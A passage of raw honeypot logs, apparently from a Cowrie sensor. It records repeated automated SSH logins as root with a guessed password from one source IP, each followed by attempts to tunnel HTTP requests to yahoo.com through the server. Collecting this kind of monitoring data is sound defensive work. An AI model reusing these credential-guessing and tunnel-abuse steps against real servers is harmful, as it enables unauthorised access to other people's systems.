,"hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:49.561852Z","src_ip":"213.209.150.239","session":"28c1f8f3d614"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:49.844645Z","src_ip":"213.209.150.239","session":"28c1f8f3d614"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":12723,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12723","sensor":"my-vps","timestamp":"2025-08-26T01:02:49.902186Z","session":"28c1f8f3d614"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:49.958925Z","src_ip":"213.209.150.239","session":"28c1f8f3d614"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":28583,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:28583","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.115242Z","session":"28c1f8f3d614"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.173041Z","src_ip":"213.209.150.239","session":"28c1f8f3d614"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.230874Z","src_ip":"213.209.150.239","session":"28c1f8f3d614"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24467,"dst_ip":"1.2.3.4","dst_port":22,"session":"645eb524ac35","protocol":"ssh","message":"New connection: 213.209.150.239:24467 (1.2.3.4:22) [session: 645eb524ac35]","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.276943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.286823Z","src_ip":"213.209.150.239","session":"645eb524ac35"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.324325Z","src_ip":"213.209.150.239","session":"645eb524ac35"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.559607Z","src_ip":"213.209.150.239","session":"645eb524ac35"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":9742,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:9742","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.607689Z","session":"645eb524ac35"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.656155Z","src_ip":"213.209.150.239","session":"645eb524ac35"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":23442,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23442","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.801528Z","session":"645eb524ac35"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.848768Z","src_ip":"213.209.150.239","session":"645eb524ac35"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.896865Z","src_ip":"213.209.150.239","session":"645eb524ac35"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24518,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d4573df60b9","protocol":"ssh","message":"New connection: 213.209.150.239:24518 (1.2.3.4:22) [session: 9d4573df60b9]","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.943117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.944037Z","src_ip":"213.209.150.239","session":"9d4573df60b9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:50.991303Z","src_ip":"213.209.150.239","session":"9d4573df60b9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:51.228548Z","src_ip":"213.209.150.239","session":"9d4573df60b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":18582,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:18582","sensor":"my-vps","timestamp":"2025-08-26T01:02:51.276847Z","session":"9d4573df60b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:51.324943Z","src_ip":"213.209.150.239","session":"9d4573df60b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":26804,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26804","sensor":"my-vps","timestamp":"2025-08-26T01:02:51.461587Z","session":"9d4573df60b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:51.508910Z","src_ip":"213.209.150.239","session":"9d4573df60b9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:51.557160Z","src_ip":"213.209.150.239","session":"9d4573df60b9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24569,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1ac338f39a8","protocol":"ssh","message":"New connection: 213.209.150.239:24569 (1.2.3.4:22) [session: f1ac338f39a8]","sensor":"my-vps","timestamp":"2025-08-26T01:02:51.603069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:51.603727Z","src_ip":"213.209.150.239","session":"f1ac338f39a8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:51.651187Z","src_ip":"213.209.150.239","session":"f1ac338f39a8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:51.885724Z","src_ip":"213.209.150.239","session":"f1ac338f39a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":13574,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:13574","sensor":"my-vps","timestamp":"2025-08-26T01:02:51.934046Z","session":"f1ac338f39a8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:51.981320Z","src_ip":"213.209.150.239","session":"f1ac338f39a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":13771,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:13771","sensor":"my-vps","timestamp":"2025-08-26T01:02:52.117456Z","session":"f1ac338f39a8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:52.164562Z","src_ip":"213.209.150.239","session":"f1ac338f39a8"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:52.212732Z","src_ip":"213.209.150.239","session":"f1ac338f39a8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24610,"dst_ip":"1.2.3.4","dst_port":22,"session":"efaa98ba8d76","protocol":"ssh","message":"New connection: 213.209.150.239:24610 (1.2.3.4:22) [session: efaa98ba8d76]","sensor":"my-vps","timestamp":"2025-08-26T01:02:52.268724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:52.269976Z","src_ip":"213.209.150.239","session":"efaa98ba8d76"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:52.327055Z","src_ip":"213.209.150.239","session":"efaa98ba8d76"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:52.610218Z","src_ip":"213.209.150.239","session":"efaa98ba8d76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59412,"dst_ip":"1.2.3.4","dst_port":23,"session":"24a95c97d52a","protocol":"telnet","message":"New connection: 212.227.235.229:59412 (1.2.3.4:23) [session: 24a95c97d52a]","sensor":"my-vps","timestamp":"2025-08-26T01:02:52.617405Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":20011,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:20011","sensor":"my-vps","timestamp":"2025-08-26T01:02:52.667979Z","session":"efaa98ba8d76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:52.726592Z","src_ip":"213.209.150.239","session":"efaa98ba8d76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":31527,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:31527","sensor":"my-vps","timestamp":"2025-08-26T01:02:52.887239Z","session":"efaa98ba8d76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:52.943987Z","src_ip":"213.209.150.239","session":"efaa98ba8d76"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:53.001963Z","src_ip":"213.209.150.239","session":"efaa98ba8d76"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24655,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cb74cd2a34c","protocol":"ssh","message":"New connection: 213.209.150.239:24655 (1.2.3.4:22) [session: 5cb74cd2a34c]","sensor":"my-vps","timestamp":"2025-08-26T01:02:53.048077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:53.048814Z","src_ip":"213.209.150.239","session":"5cb74cd2a34c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:53.096330Z","src_ip":"213.209.150.239","session":"5cb74cd2a34c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:53.330523Z","src_ip":"213.209.150.239","session":"5cb74cd2a34c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":18165,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:18165","sensor":"my-vps","timestamp":"2025-08-26T01:02:53.379011Z","session":"5cb74cd2a34c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:53.426262Z","src_ip":"213.209.150.239","session":"5cb74cd2a34c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":31838,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:31838","sensor":"my-vps","timestamp":"2025-08-26T01:02:53.561427Z","session":"5cb74cd2a34c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:53.608527Z","src_ip":"213.209.150.239","session":"5cb74cd2a34c"}
